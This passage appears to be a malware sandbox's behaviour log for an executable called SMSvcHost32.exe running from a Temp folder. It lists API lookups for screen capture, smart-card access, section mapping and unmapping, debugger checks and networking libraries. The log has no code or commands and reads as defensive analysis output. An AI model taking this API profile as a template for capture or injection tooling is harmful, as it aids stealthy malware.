| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 111, address_out = 0x746c4f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x746d59f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 115, address_out = 0x746c6520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 19, address_out = 0x746d1b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x746f1110 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\gdi32.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76f82230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76f80fe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x76fb2ab0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76f80810 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76f80440 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76f82390 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x76f80d00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x76f81580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x76f82050 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x779c33a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memmove, address_out = 0x779dcc90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = wcschr, address_out = 0x779de7a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _stricmp, address_out = 0x779db580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strncmp, address_out = 0x779ddea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memchr, address_out = 0x779dc820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strncpy, address_out = 0x779ddf60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strstr, address_out = 0x779de1a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _aullrem, address_out = 0x779da880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strcspn, address_out = 0x779ddc80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = wcsstr, address_out = 0x779deaa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strchr, address_out = 0x779ddb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = wcsrchr, address_out = 0x779dea00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = strrchr, address_out = 0x779de110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = VerSetConditionMask, address_out = 0x779c1a40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 0x779d6f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwClose, address_out = 0x779d6d70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateSection, address_out = 0x779d7140 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryVirtualMemory, address_out = 0x779d6ed0 |
|
1 | |
| Module | Get Handle | module_name = WinSCard.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WinSCard.dll, base_address = 0x6fff0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winscard.dll, function = SCardEstablishContext, address_out = 0x6fffc590 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winscard.dll, function = SCardFreeMemory, address_out = 0x6fffc9c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winscard.dll, function = SCardDisconnect, address_out = 0x6fffc410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winscard.dll, function = SCardListReadersA, address_out = 0x70001ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\winscard.dll, function = SCardConnectA, address_out = 0x70000e30 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x779bd830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x765ba2b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x779bf730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x765ba290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x765b9bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x765e2430 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x765c6c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x765c6f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToTzSpecificLocalTime, address_out = 0x765c5c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadConsoleInputA, address_out = 0x765c6fc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x765b8c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x765ba790 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x765b8500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x765c5140 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x765c6a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x765c6940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x765b7950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x765c6730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765bb0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x765e2670 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x765bf7f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x765bfd90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x765c2630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x765bcd70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x765bab40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x765c2920 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x765bff10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushConsoleInputBuffer, address_out = 0x765c7080 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x765c68e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatus, address_out = 0x765b8e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryA, address_out = 0x765bb060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DebugBreak, address_out = 0x765e0920 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadConsoleInputW, address_out = 0x765c6fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCursorInfo, address_out = 0x765c70b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputAttribute, address_out = 0x765c7050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCursorInfo, address_out = 0x765c71a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleScreenBufferInfo, address_out = 0x765c70c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FillConsoleOutputCharacterW, address_out = 0x765c7070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x765c7020 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCursorPosition, address_out = 0x765c71b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleMode, address_out = 0x765c7000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadConsoleW, address_out = 0x765c6fe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleTextAttribute, address_out = 0x765c71f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNumberOfConsoleInputEvents, address_out = 0x765c6f90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x765b75f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x765b7710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x765b78b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x765c4bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x765b99f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x765c7b30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x765c6880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x765bcc30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x765b8c80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x765b38c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x765baac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x765c6820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsA, address_out = 0x765c5dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x765c6ca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x765b7990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x765c4f80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x765bf640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x779c7a80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x765c69b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x765b3870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765ba720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x765ba7e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringA, address_out = 0x765bfde0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x765c6630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x765b79a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x765b9b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationA, address_out = 0x765c6b40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x765baa80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x765ba940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x765c67d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x765b2510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x765bab60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x765c0160 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadCodePtr, address_out = 0x765bd0e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x765b2af0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisableThreadLibraryCalls, address_out = 0x765ba860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetProcessWorkingSetSize, address_out = 0x765c0120 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x765b1b90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x765c4c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x765ba100 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x7798efe0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToDosDateTime, address_out = 0x765c2930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x765c6c40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x765b9f50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x765ba840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x765c6bb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempFileNameA, address_out = 0x765c6b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FileTimeToLocalFileTime, address_out = 0x765c68d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandle, address_out = 0x765c6a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathA, address_out = 0x765c6b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x765c68b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x765b7a30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x765baaf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x765c4940 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x765b8bf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x765c6a70 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shell32.dll, base_address = 0x75120000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x771d0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shlwapi.dll, base_address = 0x74b20000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\wininet.dll, base_address = 0x702b0000 |
|
1 | |
| Module | Get Handle | module_name = CRYPT32.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x77050000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\netapi32.dll, base_address = 0x77490000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\iphlpapi.dll, base_address = 0x71d30000 |
|
1 | |
| Module | Get Handle | module_name = WINMM.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WINMM.dll, base_address = 0x6fee0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\userenv.dll, base_address = 0x701e0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x76b99590 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-12-13 14:02:00 (UTC) |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x765ba980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x765c4ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x765b7570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x765b9e30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x765c6740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x765c66a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x765c6700 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x765bb040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x765bace0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x779a7dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x779b4010 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x779b2a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x765ba7b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x779b2290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x779b2910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x779d7a60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x779cac00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x779ba890 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x765bac80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x765e0830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x775f6270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x765bfe80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x765bff80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x765e0e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x765ba750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x765e1240 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x765bad60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x765e1460 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x765b9a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x7757ded0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x765b3630 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Get Filename | module_name = WINMM.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlPcToFileHeader, address_out = 0x779b5100 |
|
1 | |
| Debug | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, type = DEBUG_STRING, text = 3540:C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz Ignition.... |
|
1 | ||
| System | Get Info | type = Hardware Information |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtDeviceIoControlFile, address_out = 0x779d6cf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryInformationFile, address_out = 0x779d6d90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtSetInformationFile, address_out = 0x779d6f10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryVolumeInformationFile, address_out = 0x779d7130 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryDirectoryFile, address_out = 0x779d6ff0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQuerySystemInformation, address_out = 0x779d7000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetQueuedCompletionStatusEx, address_out = 0x765e10f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileCompletionNotificationModes, address_out = 0x765b9dd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x765e0830 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CancelIoEx, address_out = 0x765bf450 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77986710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x775f7f60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x775f7fb0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x779c8d70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeConditionVariable, address_out = 0x779cc720 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CancelSynchronousIo, address_out = 0x765e05a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFinalPathNameByHandleW, address_out = 0x765c6ac0 |
|
1 | |
| Module | Load | module_name = powrprof.dll, base_address = 0x74770000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\powrprof.dll, function = PowerRegisterSuspendResumeNotification, address_out = 0x74775ea0 |
|
1 | |
| Module | Load | module_name = user32.dll, base_address = 0x77810000 |
|
1 | |
